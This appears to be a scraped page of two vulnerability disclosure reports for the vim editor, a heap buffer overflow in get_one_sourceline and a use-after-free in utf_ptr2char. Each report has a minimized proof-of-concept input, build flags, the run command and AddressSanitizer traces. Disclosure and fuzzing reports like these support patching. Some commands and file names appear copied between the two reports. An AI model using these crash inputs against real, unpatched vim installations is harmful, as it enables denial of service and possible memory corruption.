      0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
      0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2393051==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

CVE-2022-1160: heap buffer overflow in get_one_sourceline in vim

heap buffer overflow in get_one_sourceline in GitHub repository vim/vim prior to 8.2.

**Description**

When fuzzing vim commit `471b3aed3` I discovered a heap buffer overflow. I'm using ubuntu 20.04 with clang 13

**Proof of Concept**

Here is the minimized poc

    norm300gr0
    so
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

`./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!`

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_get_one_sourceline -c :qa!
    =================================================================
    ==2393051==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000004c6c at pc 0x000000430f36 bp 0x7fffffff7e50 sp 0x7fffffff7610
    READ of size 1 at 0x612000004c6c thread T0
        #0 0x430f35 in strlen (/home/aldo/vimtes/src/vim+0x430f35)
        #1 0xafb4c6 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1930:25
        #2 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #3 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #4 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #5 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #6 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #7 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #8 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #9 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #10 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #11 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #12 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #13 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #14 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #15 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #16 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #17 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #18 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #19 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x612000004c6c is located 0 bytes to the right of 300-byte region [0x612000004b40,0x612000004c6c)
    allocated by thread T0 here:
        #0 0x499fa9 in realloc (/home/aldo/vimtes/src/vim+0x499fa9)
        #1 0x4cbea5 in ga_grow_inner /home/aldo/vimtes/src/alloc.c:741:10
        #2 0x4cbc33 in ga_grow /home/aldo/vimtes/src/alloc.c:720:9
        #3 0x4cc637 in ga_concat /home/aldo/vimtes/src/alloc.c:834:9
        #4 0xafb1a0 in get_one_sourceline /home/aldo/vimtes/src/scriptfile.c:1919:6
        #5 0xaf9a90 in getsourceline /home/aldo/vimtes/src/scriptfile.c:2051:9
        #6 0xaf71ee in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1615:17
        #7 0xaf4765 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1115:6
        #8 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #9 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #10 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #11 0xaf7435 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #12 0xaf4e80 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #13 0xaf49b9 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #14 0xaf449d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #15 0x6d3db4 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #16 0x6c7b42 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #17 0x6cadd0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #18 0xecacd4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #19 0xec8a09 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #20 0xec240d in main /home/aldo/vimtes/src/main.c:424:12
        #21 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vimtes/src/vim+0x430f35) in strlen
    Shadow bytes around the buggy address:
      0x0c247fff8930: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 05 fa fa
      0x0c247fff8960: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]fa fa
      0x0c247fff8990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2393051==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

Use after free in utf_ptr2char in GitHub repository vim/vim prior to 8.2.4646.

✍️ Description

When fuzzing vim commit 9dac9b175, I discovered a use after free. I'm testing on ubuntu 20.04 with clang 13.

**Proof of Concept**

Here is the minimized poc

    s/\v/\r
    /\%'(\{,600}
    

How to build

    LD=lld AS=llvm-as AR=llvm-ar RANLIB=llvm-ranlib CC=clang CXX=clang++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" LDFLAGS="-ldl -fsanitize=address" ./configure --with-features=huge --enable-gui=none
    make -j$(nproc)
    

Proof of Concept

Run crafted file with this command

./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!

ASan stack trace:

    aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S poc_utf_ptr2char -c :qa!
    =================================================================
    ==49542==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000062b0 at pc 0x0000008636a8 bp 0x7fffffff5980 sp 0x7fffffff5978
    READ of size 1 at 0x6020000062b0 thread T0
        #0 0x8636a7 in utf_ptr2char /home/aldo/vimtes/src/mbyte.c:1789:9
        #1 0xaa6a07 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3317:12
        #2 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #3 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #4 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #5 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #6 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #7 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #8 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #9 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #10 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #11 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #12 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #13 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #14 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #15 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #16 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #17 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #18 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #19 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #20 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #21 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #22 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #23 0x41edcd in _start (/home/aldo/vimtes/src/vim+0x41edcd)
    
    0x6020000062b0 is located 0 bytes inside of 1-byte region [0x6020000062b0,0x6020000062b1)
    freed by thread T0 here:
        #0 0x499a22 in free (/home/aldo/vimtes/src/vim+0x499a22)
        #1 0x4cb4e8 in vim_free /home/aldo/vimtes/src/alloc.c:623:2
        #2 0x8768ee in ml_flush_line /home/aldo/vimtes/src/memline.c:4064:2
        #3 0x884c9c in ml_get_buf /home/aldo/vimtes/src/memline.c:2651:2
        #4 0x8823b8 in ml_get /home/aldo/vimtes/src/memline.c:2564:12
        #5 0x8b2a93 in dec /home/aldo/vimtes/src/misc2.c:424:6
        #6 0x8b2cd4 in decl /home/aldo/vimtes/src/misc2.c:443:14
        #7 0xc86249 in findsent /home/aldo/vimtes/src/textobject.c:53:7
        #8 0x847de7 in getmark_buf_fnum /home/aldo/vimtes/src/mark.c:354:6
        #9 0x8477a4 in getmark_buf /home/aldo/vimtes/src/mark.c:287:12
        #10 0xaa6d84 in regmatch /home/aldo/vimtes/src/./regexp_bt.c:3364:9
        #11 0xaa58ca in regtry /home/aldo/vimtes/src/./regexp_bt.c:4722:9
        #12 0xaa5231 in bt_regexec_both /home/aldo/vimtes/src/./regexp_bt.c:4955:15
        #13 0xa97dec in bt_regexec_multi /home/aldo/vimtes/src/./regexp_bt.c:5067:12
        #14 0xa312ac in vim_regexec_multi /home/aldo/vimtes/src/regexp.c:2864:14
        #15 0xb01a23 in searchit /home/aldo/vimtes/src/search.c:767:14
        #16 0xb06edc in do_search /home/aldo/vimtes/src/search.c:1565:6
        #17 0x6dd9d4 in get_address /home/aldo/vimtes/src/ex_docmd.c:4351:12
        #18 0x6e06ee in parse_cmd_address /home/aldo/vimtes/src/ex_docmd.c:3265:9
        #19 0x6ce320 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:1938:6
        #20 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #21 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #22 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #23 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #24 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #25 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #26 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #27 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #28 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #29 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
    
    previously allocated by thread T0 here:
        #0 0x499c8d in malloc (/home/aldo/vimtes/src/vim+0x499c8d)
        #1 0x4cb0e0 in lalloc /home/aldo/vimtes/src/alloc.c:248:11
        #2 0x4cb039 in alloc /home/aldo/vimtes/src/alloc.c:151:12
        #3 0xbcc84c in vim_strnsave /home/aldo/vimtes/src/strings.c:44:9
        #4 0x885952 in ml_replace_len /home/aldo/vimtes/src/memline.c:3441:13
        #5 0x885826 in ml_replace /home/aldo/vimtes/src/memline.c:3404:12
        #6 0x6ba35c in ex_substitute /home/aldo/vimtes/src/ex_cmds.c:4665:4
        #7 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #8 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #9 0xaf7105 in do_source_ext /home/aldo/vimtes/src/scriptfile.c:1632:5
        #10 0xaf4b50 in do_source /home/aldo/vimtes/src/scriptfile.c:1758:12
        #11 0xaf4689 in cmd_source /home/aldo/vimtes/src/scriptfile.c:1132:14
        #12 0xaf416d in ex_source /home/aldo/vimtes/src/scriptfile.c:1158:2
        #13 0x6d3c94 in do_one_cmd /home/aldo/vimtes/src/ex_docmd.c:2567:2
        #14 0x6c7a22 in do_cmdline /home/aldo/vimtes/src/ex_docmd.c:993:17
        #15 0x6cacb0 in do_cmdline_cmd /home/aldo/vimtes/src/ex_docmd.c:587:12
        #16 0xeca9a4 in exe_commands /home/aldo/vimtes/src/main.c:3080:2
        #17 0xec86d9 in vim_main2 /home/aldo/vimtes/src/main.c:772:2
        #18 0xec20dd in main /home/aldo/vimtes/src/main.c:424:12
        #19 0x7ffff78240b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-use-after-free /home/aldo/vimtes/src/mbyte.c:1789:9 in utf_ptr2char
    Shadow bytes around the buggy address:
      0x0c047fff8c00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
      0x0c047fff8c20: fa fa 00 00 fa fa 00 00 fa fa 05 fa fa fa 00 fa
      0x0c047fff8c30: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 03 fa
      0x0c047fff8c40: fa fa fd fa fa fa 03 fa fa fa fd fa fa fa 00 00
    =>0x0c047fff8c50: fa fa 01 fa fa fa[fd]fa fa fa 00 04 fa fa 00 04
      0x0c047fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==49542==ABORTING
    

**💥 Impact**

This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution

Tag

#ubuntu